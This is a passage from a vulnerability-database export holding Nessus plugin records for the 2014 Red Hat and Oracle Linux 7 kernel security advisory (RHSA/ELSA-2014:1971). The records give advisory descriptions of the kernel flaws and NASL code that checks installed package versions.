found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1971\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2929\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4027\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4654\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4656\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4652\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-6410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3181\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3184\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3185\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-5045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3687\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3631\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1739\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3673\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3688\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3186\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2014:1971\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1971\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-123.13.1.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-17T12:49:19", "description": "From Red Hat Security Advisory 2014:1971 :\n\nUpdated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2014-12-10T00:00:00", "title": "Oracle Linux 7 : kernel (ELSA-2014-1971)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3181", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "modified": "2014-12-10T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-tools", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-tools-libs", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-tools-libs-devel", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2014-1971.NASL", "href": "https://www.tenable.com/plugins/nessus/79845", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1971 and \n# Oracle Linux Security Advisory ELSA-2014-1971 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79845);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-2929\", \"CVE-2014-1739\", \"CVE-2014-3181\", \"CVE-2014-3182\", \"CVE-2014-3184\", \"CVE-2014-3185\", \"CVE-2014-3186\", \"CVE-2014-3631\", \"CVE-2014-3673\", \"CVE-2014-3687\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4654\", \"CVE-2014-4655\", \"CVE-2014-4656\", \"CVE-2014-5045\", \"CVE-2014-6410\");\n script_bugtraq_id(64111, 68048, 68159, 68162, 68163, 68862, 69763, 69768, 69770, 69779, 69781, 69799, 70095, 70743, 70745, 70746, 70766, 70768, 70883);\n script_xref(name:\"RHSA\", value:\"2014:1971\");\n\n script_name(english:\"Oracle Linux 7 : kernel (ELSA-2014-1971)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"From Red Hat Security Advisory 2014:1971 :\n\nUpdated kernel packages that fix multiple security issues and several\nbugs are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled malformed or duplicate Address Configuration Change Chunks\n(ASCONF). A remote attacker could use either of these flaws to crash\nthe system. (CVE-2014-3673, CVE-2014-3687, Important)\n\n* A flaw was found in the way the Linux kernel's SCTP implementation\nhandled the association's output queue. A remote attacker could send\nspecially crafted packets that would cause the system to use an\nexcessive amount of memory, leading to a denial of service.\n(CVE-2014-3688, Important)\n\n* Two flaws were found in the way the Apple Magic Mouse/Trackpad\nmulti-touch driver and the Minibox PicoLCD driver handled invalid HID\nreports. An attacker with physical access to the system could use\nthese flaws to crash the system or, potentially, escalate their\nprivileges on the system. (CVE-2014-3181, CVE-2014-3186, Moderate)\n\n* A memory corruption flaw was found in the way the USB ConnectTech\nWhiteHEAT serial driver processed completion commands sent via USB\nRequest Blocks buffers. An attacker with physical access to the system\ncould use this flaw to crash the system or, potentially, escalate\ntheir privileges on the system. (CVE-2014-3185, Moderate)\n\n* A flaw was found in the way the Linux kernel's keys subsystem\nhandled the termination condition in the associative array garbage\ncollection functionality. A local, unprivileged user could use this\nflaw to crash the system. (CVE-2014-3631, Moderate)\n\n* Multiple flaws were found in the way the Linux kernel's ALSA\nimplementation handled user controls. A local, privileged user could\nuse either of these flaws to crash the system. (CVE-2014-4654,\nCVE-2014-4655, CVE-2014-4656, Moderate)\n\n* A flaw was found in the way the Linux kernel's VFS subsystem handled\nreference counting when performing unmount operations on symbolic\nlinks. A local, unprivileged user could use this flaw to exhaust all\navailable memory on the system or, potentially, trigger a\nuse-after-free error, resulting in a system crash or privilege\nescalation. (CVE-2014-5045, Moderate)\n\n* A flaw was found in the way the get_dumpable() function return value\nwas interpreted in the ptrace subsystem of the Linux kernel. When\n'fs.suid_dumpable' was set to 2, a local, unprivileged local user\ncould use this flaw to bypass intended ptrace restrictions and obtain\npotentially sensitive information. (CVE-2013-2929, Low)\n\n* A stack overflow flaw caused by infinite recursion was found in the\nway the Linux kernel's UDF file system implementation processed\nindirect ICBs. An attacker with physical access to the system could\nuse a specially crafted UDF image to crash the system. (CVE-2014-6410,\nLow)\n\n* An information leak flaw in the way the Linux kernel handled media\ndevice enumerate entities IOCTL requests could allow a local user able\nto access the /dev/media0 device file to leak kernel memory bytes.\n(CVE-2014-1739, Low)\n\n* An out-of-bounds read flaw in the Logitech Unifying receiver driver\ncould allow an attacker with physical access to the system to crash\nthe system or, potentially, escalate their privileges on the system.\n(CVE-2014-3182, Low)\n\n* Multiple out-of-bounds write flaws were found in the way the Cherry\nCymotion keyboard driver, KYE/Genius device drivers, Logitech device\ndrivers, Monterey Genius KB29E keyboard driver, Petalynx Maxter remote\ncontrol driver, and Sunplus wireless desktop driver handled invalid\nHID reports. An attacker with physical access to the system could use\neither of these flaws to write data past an allocated memory buffer.\n(CVE-2014-3184, Low)\n\n* An information leak flaw was found in the RAM Disks Memory Copy\n(rd_mcp) back end driver of the iSCSI Target subsystem could allow a\nprivileged user to leak the contents of kernel memory to an iSCSI\ninitiator remote client. (CVE-2014-4027, Low)\n\n* An information leak flaw in the Linux kernel's ALSA implementation\ncould allow a local, privileged user to leak kernel memory to user\nspace. (CVE-2014-4652, Low)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-December/004709.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 